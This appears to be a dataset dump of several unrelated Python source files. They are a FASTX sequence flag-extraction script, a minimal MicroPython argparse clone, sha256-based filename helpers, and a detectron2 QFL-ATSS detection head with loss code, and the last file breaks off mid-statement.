scriptio.set_tempdir(args) if args.pattern is None: logging.info( "No pattern specified (--pattern), nothing to do. :person_shrugging:" ) sys.exit() args.pattern = ( AlphaNumericPattern(args.pattern) if args.simple_pattern else re.compile(args.pattern) ) if args.log_file is not None: scriptio.add_log_file_handler(args.log_file) ap.log_args(args) logging.info("[bold underline red]Flag extraction[/]") if args.selected_flags is not None: logging.info(f"Selected flags\t{args.selected_flags}") logging.info(f"Flag stats\t{args.flagstats}") logging.info(f"Flag delim\t'{args.flag_delim}'") logging.info(f"Comment delim\t'{args.comment_space}'") logging.info(f"Quality flags\t{args.qual_flags}") if args.split_by is not None: logging.info(f"Split by\t'{args.split_by}'") return args ChunkDetails = Tuple[int, int, int, FlagStats] def run_chunk( chunk: List[SimpleFastxRecord], cid: int, args: argparse.Namespace, ) -> ChunkDetails: fmt, _ = get_fastx_format(args.input) OHC: Union[SimpleFastxWriter, SimpleSplitFastxWriter, None] FHC: Union[SimpleFastxWriter, SimpleSplitFastxWriter, None] OHC, UHC, FHC, filter_output_fun = ( get_handles(fmt, cid, args) if args.split_by is None else get_split_handles(fmt, cid, args) ) foutput = scriptio.get_output_fun(OHC, UHC) matcher = FastxMatcher(args.pattern) trimmer = get_fastx_trimmer(fmt) quality_flag_filters, filter_fun = setup_qual_filters( args.filter_qual_flags, args.phred_offset ) flag_extractor = get_fastx_flag_extractor(fmt)(args.selected_flags, args.flagstats) flag_extractor.flag_delim = args.flag_delim flag_extractor.comment_space = args.comment_space if isinstance(flag_extractor, FastqFlagExtractor): flag_extractor.extract_qual_flags = args.qual_flags filtered_counter = 0 for record in chunk: flags: Dict[str, FlagData] = {} match, matched = matcher.do(record) if matched: flags = flag_extractor.extract_all(record, match) flag_extractor.update_stats(flags) flags_selected = flag_extractor.apply_selection(flags) record = flag_extractor.update(record, flags_selected) record = trimmer.trim_re(record, match) pass_filters = filter_fun(flags, quality_flag_filters) if not pass_filters: filtered_counter += 1 filter_output_fun(record, flags) continue foutput[matched](record, flags) SimpleFastxWriter.close_handle(OHC) SimpleFastxWriter.close_handle(UHC) SimpleFastxWriter.close_handle(FHC) return ( filtered_counter, matcher.matched_count, len(chunk), flag_extractor.flagstats, ) def merge_chunk_details(chunk_details: List[ChunkDetails]) -> ChunkDetails: parsed_counter = 0 matched_counter = 0 filtered_counter = 0 flagstats: FlagStats = FlagStats() for filtered, matched, parsed, stats in chunk_details: filtered_counter += filtered matched_counter += matched parsed_counter += parsed for flag_name, data in stats.items(): for k, v in data.items(): flagstats[flag_name][k] += v return (parsed_counter, matched_counter, filtered_counter, flagstats) @enable_rich_assert def run(args: argparse.Namespace) -> None: fmt, IH = scriptio.get_input_handler(args.input, args.chunk_size) quality_flag_filters, filter_fun = setup_qual_filters( args.filter_qual_flags, args.phred_offset, verbose=True ) logging.info("[bold underline red]Running[/]") logging.info("Trimming and extracting flags...") chunk_details = joblib.Parallel(n_jobs=args.threads, verbose=10)( joblib.delayed(run_chunk)(chunk, cid, args) for chunk, cid in IH ) logging.info("Merging subprocesses details...") n_parsed, n_matched, n_filtered, flagstats = merge_chunk_details(chunk_details) logging.info( f"{n_matched}/{n_parsed} ({n_matched/n_parsed*100:.2f}%) " + "records matched the pattern.", ) if args.filter_qual_flags is not None and 0 != n_matched: logging.info( " ".join( ( f"{(n_matched-n_filtered)}/{n_matched}", f"({(n_matched-n_filtered)/n_matched*100:.2f}%)", "records passed the quality filters.", ) ) ) if args.flagstats is not None: flagstats.export(args.output) logging.info("Merging batch output...") if args.unmatched_output is not None: merger = ChunkMerger(args.temp_dir, None) merger.do(args.unmatched_output, IH.last_chunk_id, "Writing unmatched records") merger = ChunkMerger(args.temp_dir, args.split_by) merger.do(args.output, IH.last_chunk_id, "Writing matched records") if args.filter_qual_output is not None: merger.do(args.filter_qual_output, IH.last_chunk_id, "Writing filtered records") logging.info("Done. :thumbs_up: :smiley:")
nilq/baby-python
python
""" Minimal and functional version of CPython's argparse module. """ import sys try: from ucollections import namedtuple except ImportError: from collections import namedtuple class _ArgError(BaseException): pass class _Arg: def __init__(self, names, dest, metavar, arg_type, action, nargs, const, default, required, choices, help): self.names = names self.dest = dest self.metavar = metavar self.arg_type = arg_type self.action = action self.nargs = nargs self.const = const self.default = default self.required = required self.choices = choices self.help = help def parse(self, optname, args): # parse args for this Arg def _checked(_arg): if self.choices and _arg not in self.choices: raise _ArgError("value %s must be one of this '%s'" % (_arg, ', '.join(map(str, self.choices)))) try: return self.arg_type(_arg) except (TypeError, ValueError, OSError): try: raise _ArgError('invalid %s value: %s' % (self.arg_type.__name__, _arg)) except AttributeError: raise _ArgError('value %s is not applicable for type of key %s' % (_arg, optname)) if self.action == "store" or self.action == "append": if self.nargs is None: if args: return _checked(args.pop(0)) else: raise _ArgError("expecting value for %s" % optname) elif self.nargs == "?": if args: return _checked(args.pop(0)) else: return self.default else: if self.nargs == "*": n = -1 elif self.nargs == "+": if not args: raise _ArgError("expecting value for %s" % optname) n = -1 else: n = int(self.nargs) ret = [] stop_at_opt = True while args and n != 0: if stop_at_opt and args[0].startswith("-") and args[0] != "-": if args[0] == "--": stop_at_opt = False args.pop(0) else: break else: ret.append(_checked(args.pop(0))) n -= 1 if n > 0: raise _ArgError("expecting value for %s" % optname) return ret elif self.action == "store_const": return self.const elif self.action == "append": if args: return _checked(args.pop(0)) else: raise _ArgError("expecting value for %s" % optname) else: assert False class FileType: def __init__(self, mode='r', bufsize=-1, encoding=None, errors=None): self._mode = mode self._bufsize = bufsize self._encoding = encoding self._errors = errors def __call__(self, string): # the special argument "-" means sys.std{in,out} if string == '-': if 'r' in self._mode: return sys.stdin elif 'w' in self._mode: return sys.stdout else: msg = 'argument "-" with mode %r' % self._mode raise _ArgError(msg) # all other arguments are used as file names try: # return open(string, self._mode, self._bufsize, self._encoding,self._errors) # incompatible with micropython return open(string, self._mode) except OSError as e: message = "can't open '%s': %s" raise _ArgError(message % (string, e)) def __repr__(self): args = self._mode, self._bufsize kwargs = [('encoding', self._encoding), ('errors', self._errors)] args_str = ', '.join([repr(arg) for arg in args if arg != -1] + ['%s=%r' % (kw, arg) for kw, arg in kwargs if arg is not None]) return '%s(%s)' % (type(self).__name__, args_str) def _dest_from_optnames(opt_names): dest = opt_names[0] for name in opt_names: if name.startswith("--"): dest = name break return dest.lstrip("-").replace("-", "_") class ArgumentParser: def __init__(self, *, prog=None, description="", epilog=""): self.prog = sys.argv[0] if (sys.argv and not prog) else prog self.description = description self.epilog = epilog self.opt = [] self.pos = [] def add_argument(self, *args, **kwargs): action = kwargs.get("action", "store") if action == "store_true": action = "store_const" const = True default = kwargs.get("default", False) elif action == "store_false": action = "store_const" const = False default = kwargs.get("default", True) else: const = kwargs.get("const", None) default = kwargs.get("default", None) if args and args[0].startswith("-"): list = self.opt dest = kwargs.get("dest") if dest is None: dest = _dest_from_optnames(args) else: list = self.pos dest = kwargs.get("dest") if dest is None: dest = args[0] if not args: args = [dest] arg_type = kwargs.get("type", str) nargs = kwargs.get("nargs", None) metavar = kwargs.get("metavar", None) required = kwargs.get("required", False) choices = kwargs.get("choices", None) help = kwargs.get("help", "") list.append( _Arg(args, dest, metavar, arg_type, action, nargs, const, default, required, choices, help)) def usage(self, full): # print short usage print("usage: %s [-h, --help]" % self.prog, end="") def render_arg(arg): if arg.action in ["store", "append"]: if arg.metavar: arg_for_render = "%s" % arg.metavar.upper() elif arg.choices: arg_for_render = "[%s]" % ", ".join(arg.choices) else: arg_for_render = arg.dest.upper() if arg.nargs is None: return " %s" % arg_for_render if isinstance(arg.nargs, int): return " %s(x%d)" % (arg_for_render, arg.nargs) else: return " [%s...]" % arg_for_render else: return "" for opt in self.opt: print(" [%s%s]" % (', '.join(opt.names), render_arg(opt)), end="") for pos in self.pos: print(render_arg(pos), end="") print() if not full: return # print full information print() if self.description: print(self.description) if self.pos: print("\nPositional arguments:") for pos in self.pos: print(" %-20s%s" % (pos.names[0], pos.help)) print("\nNamed arguments:") print(" -h, --help show this message and exit") for opt in self.opt: # Dont show help with possible values for opt. It's stays in "usage" anyway. # print(" %-20s%s " % (', '.join(opt.names) + render_arg(opt).upper(), opt.help)) print(" %-20s%s" % (', '.join(opt.names), opt.help)) print("\n", self.epilog) def parse_args(self, args=None): return self._parse_args_impl(args, False) def parse_known_args(self, args=None): return self._parse_args_impl(args, True) def _parse_args_impl(self, args, return_unknown): if args is None: args = sys.argv[1:] else: args = args[:] try: return self._parse_args(args, return_unknown) except _ArgError as e: self.usage(False) print("error:", e) sys.exit(2) def _parse_args(self, args, return_unknown): # add optional(named) args with defaults arg_dest = [] arg_vals = [] for opt in self.opt: arg_dest.append(opt.dest) arg_vals.append(opt.default) # deal with unknown arguments, if needed unknown = [] def consume_unknown(): while args and not args[0].startswith("-"): unknown.append(args.pop(0)) # parse all args parsed_pos = False while args or not parsed_pos: if args and args[0].startswith("-") and args[0] != "-" and args[0] != "--": # optional(named) arguments a = args.pop(0) if a in ("-h", "--help"): self.usage(True) sys.exit(0) found = False for i, opt in enumerate(self.opt): if a in opt.names: if opt.action == "append": if type(arg_vals[i]) is type(None): arg_vals[i] = [] arg_vals[i].append(opt.parse(a, args)) found = True else: arg_vals[i] = opt.parse(a, args) found = True break if not found: if return_unknown: unknown.append(a) consume_unknown() else: raise _ArgError("unknown option %s" % a) else: # positional arguments if parsed_pos: if return_unknown: unknown = unknown + args break else: raise _ArgError("extra args: %s" % " ".join(args)) for pos in self.pos: arg_dest.append(pos.dest) arg_vals.append(pos.parse(pos.names[0], args)) parsed_pos = True if return_unknown: consume_unknown() # checks the required arguments required_but_not_used = ([arg.dest for i, arg in enumerate(self.opt) if arg.required == True and arg_vals[i] == None]) if required_but_not_used: raise _ArgError("option(s) '%s' is(are) required" % ", ".join(required_but_not_used)) values = namedtuple("args", arg_dest)(*arg_vals) return (values, unknown) if return_unknown else values
nilq/baby-python
python
import json from hashlib import sha256 from typing import List from ..configs import BaseLayerConfig def create_dir_name_from_config(config: BaseLayerConfig, prefix: str = "") -> str: config_class_name = config.__class__.__name__ config_json = json.dumps(config.to_dict_without_cache()) return f"{prefix}{sha256((config_class_name + config_json).encode()).hexdigest()}" def create_file_name_from_path(path: str, ext: str, prefix: str = "") -> str: return f"{prefix}{sha256(path.encode()).hexdigest()}.{ext}" def create_file_name_from_paths(paths: List[str], ext: str, prefix: str = "") -> str: return f"{prefix}{sha256(json.dumps(sorted(paths)).encode()).hexdigest()}.{ext}"
nilq/baby-python
python
#!/usr/bin/env python3 # @Time : 27/6/29 2:46 PM # @Author : fangcheng.ji # @FileName: qfl_atss.py import math import torch import torch.nn.functional as F from torch import nn import os from typing import Dict, List from .fcos import Scale from detectron2.modeling.proposal_generator.build import PROPOSAL_GENERATOR_REGISTRY from detectron2.layers import ShapeSpec, cat, ml_nms, quality_focal_loss from detectron2.layers import DFConv2d, get_norm from detectron2.structures import Instances, Boxes, pairwise_iou, matched_boxlist_iou from detectron2.utils.comm import get_world_size, reduce_sum from fvcore.nn import sigmoid_focal_loss_jit from ..anchor_generator import build_anchor_generator from ..matcher import Matcher INF = 100000000 @PROPOSAL_GENERATOR_REGISTRY.register() class QFLATSS(torch.nn.Module): def __init__(self, cfg, input_shape: Dict[str, ShapeSpec]): super(QFLATSS, self).__init__() self.cfg = cfg self.in_features = cfg.MODEL.ATSS.IN_FEATURES feature_shapes = [input_shape[f] for f in self.in_features] in_channels = [f.channels for f in feature_shapes] assert len(set(in_channels)) == 1, "Each level must have the same channel!" in_channels = in_channels[0] self.fcos_head = ATSSHead(cfg, in_channels) box_coder = BoxCoder(cfg) self.loss_evaluator = ATSSLossComputation(cfg, box_coder) # for inference self.box_selector_test = ATSSPostProcessor( pre_nms_thresh=cfg.MODEL.ATSS.INFERENCE_TH, pre_nms_top_n=cfg.MODEL.ATSS.PRE_NMS_TOP_N, nms_thresh=cfg.MODEL.ATSS.NMS_TH, fpn_post_nms_top_n=cfg.MODEL.ATSS.POST_NMS_TOPK_TEST, min_size=0, num_classes=cfg.MODEL.ATSS.NUM_CLASSES + 1, # add background bbox_aug_enabled=cfg.TEST.AUG.ENABLED, box_coder=box_coder, ) # self.anchor_generator = make_anchor_generator_atss(cfg) self.anchor_generator = build_anchor_generator(cfg, feature_shapes) def forward(self, images, features, gt_instances): features = [features[f] for f in self.in_features] box_cls, box_regression = self.fcos_head(features) anchors = self.anchor_generator(features) if self.training: return self._forward_train(box_cls, box_regression, gt_instances, anchors) else: return self._forward_test(images.image_sizes, box_cls, box_regression, anchors) def _forward_train(self, box_cls, box_regression, gt_instances, anchors): loss_box_cls, loss_box_reg = self.loss_evaluator( box_cls, box_regression, gt_instances, anchors ) losses = { "loss_cls": loss_box_cls, "loss_reg": loss_box_reg, } return None, losses def _forward_test(self, image_sizes, box_cls, box_regression, anchors): boxes = self.box_selector_test(image_sizes, box_cls, box_regression, anchors) return boxes, {} class ATSSHead(torch.nn.Module): def __init__(self, cfg, in_channels): super(ATSSHead, self).__init__() self.cfg = cfg num_classes = cfg.MODEL.ATSS.NUM_CLASSES num_anchors = len(cfg.MODEL.ANCHOR_GENERATOR.ASPECT_RATIOS[0]) * len(cfg.MODEL.ANCHOR_GENERATOR.SIZES[0]) head_configs = {"cls": (cfg.MODEL.ATSS.NUM_CONVS, False), "bbox": (cfg.MODEL.ATSS.NUM_CONVS, cfg.MODEL.ATSS.USE_DCN_IN_TOWER), } norm = None if cfg.MODEL.ATSS.NORM == "none" else cfg.MODEL.ATSS.NORM for head in head_configs: tower = [] num_convs, use_deformable = head_configs[head] if use_deformable: conv_func = DFConv2d else: conv_func = nn.Conv2d for i in range(num_convs): tower.append(conv_func( in_channels, in_channels, kernel_size=3, stride=1, padding=1, bias=True )) if norm == "GN": tower.append(nn.GroupNorm(32, in_channels)) elif norm is not None: tower.append(get_norm(norm, in_channels)) tower.append(nn.ReLU()) self.add_module('{}_tower'.format(head), nn.Sequential(*tower)) self.cls_logits = nn.Conv2d( in_channels, num_anchors * num_classes, kernel_size=3, stride=1, padding=1 ) self.bbox_pred = nn.Conv2d( in_channels, num_anchors * 4, kernel_size=3, stride=1, padding=1 ) # initialization for modules in [self.cls_tower, self.bbox_tower, self.cls_logits, self.bbox_pred, ]: for l in modules.modules(): if isinstance(l, nn.Conv2d): torch.nn.init.normal_(l.weight, std=0.01) torch.nn.init.constant_(l.bias, 0) # initialize the bias for focal loss prior_prob = cfg.MODEL.ATSS.PRIOR_PROB bias_value = -math.log((1 - prior_prob) / prior_prob) torch.nn.init.constant_(self.cls_logits.bias, bias_value) if self.cfg.MODEL.ATSS.REGRESSION_TYPE == 'POINT': assert num_anchors == 1, "regressing from a point only support num_anchors == 1" torch.nn.init.constant_(self.bbox_pred.bias, 4) self.scales = nn.ModuleList([Scale(init_value=1.0) for _ in range(5)]) def forward(self, x): logits = [] bbox_reg = [] for l, feature in enumerate(x): cls_tower = self.cls_tower(feature) box_tower = self.bbox_tower(feature) logits.append(self.cls_logits(cls_tower)) bbox_pred = self.scales[l](self.bbox_pred(box_tower)) if self.cfg.MODEL.ATSS.REGRESSION_TYPE == 'POINT': bbox_pred = F.relu(bbox_pred) bbox_reg.append(bbox_pred) return logits, bbox_reg class ATSSLossComputation(object): def __init__(self, cfg, box_coder): self.cfg = cfg self.focal_loss_alpha = cfg.MODEL.ATSS.LOSS_ALPHA self.focal_loss_gamma = cfg.MODEL.ATSS.LOSS_GAMMA self.num_classes = cfg.MODEL.ATSS.NUM_CLASSES self.matcher = Matcher( cfg.MODEL.ATSS.IOU_THRESHOLDS, cfg.MODEL.ATSS.IOU_LABELS, allow_low_quality_matches=True ) self.box_coder = box_coder def GIoULoss(self, pred, target, anchor, weight=None): pred_boxes = self.box_coder.decode(pred.view(-1, 4), anchor.view(-1, 4)) pred_x1 = pred_boxes[:, 0] pred_y1 = pred_boxes[:, 1] pred_x2 = pred_boxes[:, 2] pred_y2 = pred_boxes[:, 3] pred_x2 = torch.max(pred_x1, pred_x2) pred_y2 = torch.max(pred_y1, pred_y2) pred_area = (pred_x2 - pred_x1) * (pred_y2 - pred_y1) gt_boxes = self.box_coder.decode(target.view(-1, 4), anchor.view(-1, 4)) target_x1 = gt_boxes[:, 0] target_y1 = gt_boxes[:, 1] target_x2 = gt_boxes[:, 2] target_y2 = gt_boxes[:, 3] target_area = (target_x2 - target_x1) * (target_y2 - target_y1) x1_intersect = torch.max(pred_x1, target_x1) y1_intersect = torch.max(pred_y1, target_y1) x2_intersect = torch.min(pred_x2, target_x2) y2_intersect = torch.min(pred_y2, target_y2) area_intersect = torch.zeros(pred_x1.size()).to(pred) mask = (y2_intersect > y1_intersect) * (x2_intersect > x1_intersect) area_intersect[mask] = (x2_intersect[mask] - x1_intersect[mask]) * (y2_intersect[mask] - y1_intersect[mask]) x1_enclosing = torch.min(pred_x1, target_x1) y1_enclosing = torch.min(pred_y1, target_y1) x2_enclosing = torch.max(pred_x2, target_x2) y2_enclosing = torch.max(pred_y2, target_y2) area_enclosing = (x2_enclosing - x1_enclosing) * (y2_enclosing - y1_enclosing) + 1e-7 area_union = pred_area + target_area - area_intersect + 1e-7 ious = area_intersect / area_union gious = ious - (area_enclosing - area_union) / area_enclosing losses = 1 - gious if weight is not None and weight.sum() > 0: return (losses * weight).sum() else: assert losses.numel() != 0 return losses.sum() def DIoULoss(self, pred, target, anchor, weight=None): pred_boxes = self.box_coder.decode(pred.view(-1, 4), anchor.view(-1, 4)) pred_x1 = pred_boxes[:, 0] pred_y1 = pred_boxes[:, 1] pred_x2 = pred_boxes[:, 2] pred_y2 = pred_boxes[:, 3] pred_x2 = torch.max(pred_x1, pred_x2) pred_y2 = torch.max(pred_y1, pred_y2) pred_area = (pred_x2 - pred_x1) * (pred_y2 - pred_y1) pred_cx = (pred_x2 + pred_x1) / 2.0 pred_cy = (pred_y2 + pred_y1) / 2.0 gt_boxes = self.box_coder.decode(target.view(-1, 4), anchor.view(-1, 4)) target_x1 = gt_boxes[:, 0] target_y1 = gt_boxes[:, 1] target_x2 = gt_boxes[:, 2] target_y2 = gt_boxes[:, 3] target_area = (target_x2 - target_x1) * (target_y2 - target_y1) target_cx = (target_x2 + target_x1) / 2.0 target_cy = (target_y2 + target_y1) / 2.0 x1_intersect = torch.max(pred_x1, target_x1) y1_intersect = torch.max(pred_y1, target_y1) x2_intersect = torch.min(pred_x2, target_x2) y2_intersect = torch.min(pred_y2, target_y2) area_intersect = torch.zeros(pred_x1.size()).to(pred) mask = (y2_intersect > y1_intersect) * (x2_intersect > x1_intersect) area_intersect[mask] = (x2_intersect[mask] - x1_intersect[mask]) * (y2_intersect[mask] - y1_intersect[mask]) x1_enclosing = torch.min(pred_x1, target_x1) y1_enclosing = torch.min(pred_y1, target_y1) x2_enclosing = torch.max(pred_x2, target_x2) y2_enclosing = torch.max(pred_y2, target_y2) c_squared = torch.pow(y2_enclosing - y1_enclosing, 2) + torch.pow(x2_enclosing - x1_enclosing, 2) + 1e-7 d_squared = torch.pow(target_cy - pred_cy, 2) + torch.pow(target_cx - pred_cx, 2) area_union = pred_area + target_area - area_intersect + 1e-7 ious = area_intersect / area_union dious = ious - d_squared / c_squared losses = 1 - dious if weight is not None and weight.sum() > 0: return (losses * weight).sum() else: assert losses.numel() != 0 return losses.sum() def prepare_targets(self, gt_instances, anchors): cls_labels = [] reg_targets = [] anchors_all_level = Boxes.cat(anchors) for im_i in range(len(gt_instances)): targets_per_im = gt_instances[im_i] bboxes_per_im = targets_per_im.gt_boxes labels_per_im = targets_per_im.gt_classes num_gt = len(bboxes_per_im) if num_gt > 0: if self.cfg.MODEL.ATSS.POSITIVE_TYPE == 'SSC': object_sizes_of_interest = [[-1, 64], [64, 128], [128, 256], [256, 512], [512, INF]] area_per_im = targets_per_im.area() expanded_object_sizes_of_interest = [] points = [] for l, anchors_per_level in enumerate(anchors[im_i]): anchors_per_level = anchors_per_level.bbox anchors_cx_per_level = (anchors_per_level[:, 2] + anchors_per_level[:, 0]) / 2.0 anchors_cy_per_level = (anchors_per_level[:, 3] + anchors_per_level[:, 1]) / 2.0 points_per_level = torch.stack((anchors_cx_per_level, anchors_cy_per_level), dim=1) points.append(points_per_level) object_sizes_of_interest_per_level = \ points_per_level.new_tensor(object_sizes_of_interest[l]) expanded_object_sizes_of_interest.append( object_sizes_of_interest_per_level[None].expand(len(points_per_level), -1) ) expanded_object_sizes_of_interest = torch.cat(expanded_object_sizes_of_interest, dim=0) points = torch.cat(points, dim=0) xs, ys = points[:, 0], points[:, 1] l = xs[:, None] - bboxes_per_im[:, 0][None] t = ys[:, None] - bboxes_per_im[:, 1][None] r = bboxes_per_im[:, 2][None] - xs[:, None] b = bboxes_per_im[:, 3][None] - ys[:, None] reg_targets_per_im = torch.stack([l, t, r, b], dim=2) is_in_boxes = reg_targets_per_im.min(dim=2)[0] > 0.01 max_reg_targets_per_im = reg_targets_per_im.max(dim=2)[0] is_cared_in_the_level = \ (max_reg_targets_per_im >= expanded_object_sizes_of_interest[:, [0]]) & \ (max_reg_targets_per_im <= expanded_object_sizes_of_interest[:, [1]]) locations_to_gt_area = area_per_im[None].repeat(len(points), 1) locations_to_gt_area[is_in_boxes == 0] = INF locations_to_gt_area[is_cared_in_the_level == 0] = INF locations_to_min_area, locations_to_gt_inds = locations_to_gt_area.min(dim=1) cls_labels_per_im = labels_per_im[locations_to_gt_inds] cls_labels_per_im[locations_to_min_area == INF] = self.num_classes matched_gts = bboxes_per_im[locations_to_gt_inds] elif self.cfg.MODEL.ATSS.POSITIVE_TYPE == 'ATSS': num_anchors_per_loc = len(self.cfg.MODEL.ANCHOR_GENERATOR.ASPECT_RATIOS[0]) \ * len(self.cfg.MODEL.ANCHOR_GENERATOR.SIZES[0]) # TODO deal with num gt is 0 num_anchors_per_level = [len(anchors_per_level) for anchors_per_level in anchors] ious = pairwise_iou(anchors_all_level, bboxes_per_im) gt_cx = (bboxes_per_im.tensor[:, 2] + bboxes_per_im.tensor[:, 0]) / 2.0 gt_cy = (bboxes_per_im.tensor[:, 3] + bboxes_per_im.tensor[:, 1]) / 2.0 gt_points = torch.stack((gt_cx, gt_cy), dim=1) anchors_cx_per_im = (anchors_all_level.tensor[:, 2] + anchors_all_level.tensor[:, 0]) / 2.0 anchors_cy_per_im = (anchors_all_level.tensor[:, 3] + anchors_all_level.tensor[:, 1]) / 2.0 anchor_points = torch.stack((anchors_cx_per_im, anchors_cy_per_im), dim=1) distances = (anchor_points[:, None, :] - gt_points[None, :, :]).pow(2).sum(-1).sqrt() # Selecting candidates based on the center distance between anchor box and object candidate_idxs = [] star_idx = 0 for level, anchors_per_level in enumerate(anchors): end_idx = star_idx + num_anchors_per_level[level] distances_per_level = distances[star_idx:end_idx, :] topk = min(self.cfg.MODEL.ATSS.TOPK * num_anchors_per_loc, num_anchors_per_level[level]) _, topk_idxs_per_level = distances_per_level.topk(topk, dim=0, largest=False) candidate_idxs.append(topk_idxs_per_level + star_idx) star_idx = end_idx candidate_idxs = torch.cat(candidate_idxs, dim=0) # Using the sum of mean and standard deviation as the IoU threshold to select final positive samples candidate_ious = ious[candidate_idxs, torch.arange(num_gt)] iou_mean_per_gt = candidate_ious.mean(0) iou_std_per_gt = candidate_ious.std(0) iou_thresh_per_gt = iou_mean_per_gt + iou_std_per_gt is_pos = candidate_ious >= iou_thresh_per_gt[None, :] # Limiting the final positive samples’ center to object anchor_num = anchors_cx_per_im.shape[0] for ng in range(num_gt): candidate_idxs[:, ng] += ng * anchor_num e_anchors_cx = anchors_cx_per_im.view(1, -1).expand(num_gt, anchor_num).contiguous().view(-1) e_anchors_cy = anchors_cy_per_im.view(1, -1).expand(num_gt, anchor_num).contiguous().view(-1) candidate_idxs = candidate_idxs.view(-1) l = e_anchors_cx[candidate_idxs].view(-1, num_gt) - bboxes_per_im.tensor[:, 0] t = e_anchors_cy[candidate_idxs].view(-1, num_gt) - bboxes_per_im.tensor[:, 1] r = bboxes_per_im.tensor[:, 2] - e_anchors_cx[candidate_idxs].view(-1, num_gt) b = bboxes_per_im.tensor[:, 3] - e_anchors_cy[candidate_idxs].view(-1, num_gt) is_in_gts = torch.stack([l, t, r, b], dim=1).min(dim=1)[0] > 0.01 is_pos = is_pos & is_in_gts # if an anchor box is assigned to multiple gts, the one with the highest IoU will be selected. ious_inf = torch.full_like(ious, -INF).t().contiguous().view(-1) index = candidate_idxs.view(-1)[is_pos.view(-1)] ious_inf[index] = ious.t().contiguous().view(-1)[index] ious_inf = ious_inf.view(num_gt, -1).t() anchors_to_gt_values, anchors_to_gt_indexs = ious_inf.max(dim=1) cls_labels_per_im = labels_per_im[anchors_to_gt_indexs] cls_labels_per_im[anchors_to_gt_values == -INF] = self.num_classes matched_gts = bboxes_per_im[anchors_to_gt_indexs] elif self.cfg.MODEL.ATSS.POSITIVE_TYPE == 'TOPK': gt_cx = (bboxes_per_im[:, 2] + bboxes_per_im[:, 0]) / 2.0 gt_cy = (bboxes_per_im[:, 3] + bboxes_per_im[:, 1]) / 2.0 gt_points = torch.stack((gt_cx, gt_cy), dim=1) anchors_cx_per_im = (anchors_all_level.tensor[:, 2] + anchors_all_level.tensor[:, 0]) / 2.0 anchors_cy_per_im = (anchors_all_level.tensor[:, 3] + anchors_all_level.tensor[:, 1]) / 2.0 anchor_points = torch.stack((anchors_cx_per_im, anchors_cy_per_im), dim=1) distances = (anchor_points[:, None, :] - gt_points[None, :, :]).pow(2).sum(-1).sqrt() distances = distances / distances.max() / 1000 ious = pairwise_iou(anchors_all_level, bboxes_per_im) is_pos = ious * False for ng in range(num_gt): _, topk_idxs = (ious[:, ng] - distances[:, ng]).topk(self.cfg.MODEL.ATSS.TOPK, dim=0) l = anchors_cx_per_im[topk_idxs] - bboxes_per_im[ng, 0] t = anchors_cy_per_im[topk_idxs] - bboxes_per_im[ng, 1] r = bboxes_per_im[ng, 2] - anchors_cx_per_im[topk_idxs] b = bboxes_per_im[ng, 3] - anchors_cy_per_im[topk_idxs] is_in_gt = torch.stack([l, t, r, b], dim=1).min(dim=1)[0] > 0.01 is_pos[topk_idxs[is_in_gt == 1], ng] = True ious[is_pos == 0] = -INF anchors_to_gt_values, anchors_to_gt_indexs = ious.max(dim=1) cls_labels_per_im = labels_per_im[anchors_to_gt_indexs] cls_labels_per_im[anchors_to_gt_values == -INF] = self.num_classes matched_gts = bboxes_per_im[anchors_to_gt_indexs] elif self.cfg.MODEL.ATSS.POSITIVE_TYPE == 'IoU': match_quality_matrix = pairwise_iou(bboxes_per_im, anchors_all_level) matched_idxs = self.matcher(match_quality_matrix) targets_per_im = targets_per_im.copy_with_fields(['labels']) matched_targets = targets_per_im[matched_idxs.clamp(min=0)] cls_labels_per_im = matched_targets.get_field("labels") cls_labels_per_im = cls_labels_per_im.to(dtype=torch.float32) # Background (negative examples) bg_indices = matched_idxs == Matcher.BELOW_LOW_THRESHOLD cls_labels_per_im[bg_indices] = 0 # discard indices that are between thresholds inds_to_discard = matched_idxs == Matcher.BETWEEN_THRESHOLDS cls_labels_per_im[inds_to_discard] = -1 matched_gts = matched_targets.bbox # Limiting positive samples’ center to object # in order to filter out poor positives and use the centerness branch pos_idxs = torch.nonzero(cls_labels_per_im > 0).squeeze(1) pos_anchors_cx = (anchors_all_level.tensor[pos_idxs, 2] + anchors_all_level.tensor[pos_idxs, 0]) / 2.0 pos_anchors_cy = (anchors_all_level.tensor[pos_idxs, 3] + anchors_all_level.tensor[pos_idxs, 1]) / 2.0 l = pos_anchors_cx - matched_gts[pos_idxs, 0] t = pos_anchors_cy - matched_gts[pos_idxs, 1] r = matched_gts[pos_idxs, 2] - pos_anchors_cx b = matched_gts[pos_idxs, 3] - pos_anchors_cy is_in_gts = torch.stack([l, t, r, b], dim=1).min(dim=1)[0] > 0.01 cls_labels_per_im[pos_idxs[is_in_gts == 0]] = -1 else: raise NotImplementedError reg_targets_per_im = self.box_coder.encode(matched_gts.tensor, anchors_all_level.tensor) else: # no gt instance # all negative reg_targets_per_im = torch.zeros_like(anchors_all_level.tensor) cls_labels_per_im = torch.zeros( len(anchors_all_level.tensor), dtype=torch.long, device=anchors_all_level.device ) + self.num_classes cls_labels.append(cls_labels_per_im) reg_targets.append(reg_targets_per_im) return cls_labels, reg_targets def compute_centerness_targets(self, reg_targets, anchors): gts = self.box_coder.decode(reg_targets, anchors) anchors_cx = (anchors[:, 2] + anchors[:, 0]) / 2 anchors_cy = (anchors[:, 3] + anchors[:, 1]) / 2 l = anchors_cx - gts[:, 0] t = anchors_cy - gts[:, 1] r = gts[:, 2] - anchors_cx b = gts[:, 3] - anchors_cy left_right = torch.stack([l, r], dim=1) top_bottom = torch.stack([t, b], dim=1) centerness = torch.sqrt((left_right.min(dim=-1)[0] / left_right.max(dim=-1)[0]) * \ (top_bottom.min(dim=-1)[0] / top_bottom.max(dim=-1)[0])) assert not torch.isnan(centerness).any() return centerness def compute_iou_score(self, reg_preds, reg_targets, anchors): gts = self.box_coder.decode(reg_targets, anchors) preds = self.box_coder.decode(reg_preds, anchors) gts = Boxes(gts) preds = Boxes(preds) return matched_boxlist_iou(preds, gts) def __call__(self, box_cls, box_regression, gt_instances, anchors): labels, reg_targets = self.prepare_targets(gt_instances, anchors) N = len(labels) box_cls_flatten, box_regression_flatten = concat_box_prediction_layers(box_cls, box_regression) labels_flatten = torch.cat(labels, dim=0) reg_targets_flatten = torch.cat(reg_targets, dim=0) anchors_flatten = torch.cat([Boxes.cat(anchors).tensor for _ in range(N)], dim=0) pos_inds = torch.nonzero(labels_flatten != self.num_classes).squeeze(1) num_gpus = get_num_gpus() total_num_pos = reduce_sum(pos_inds.new_tensor([pos_inds.numel()])).item() num_pos_avg_per_gpu = max(total_num_pos / float(num_gpus), 1.0) # one hot label for focal loss class_target = 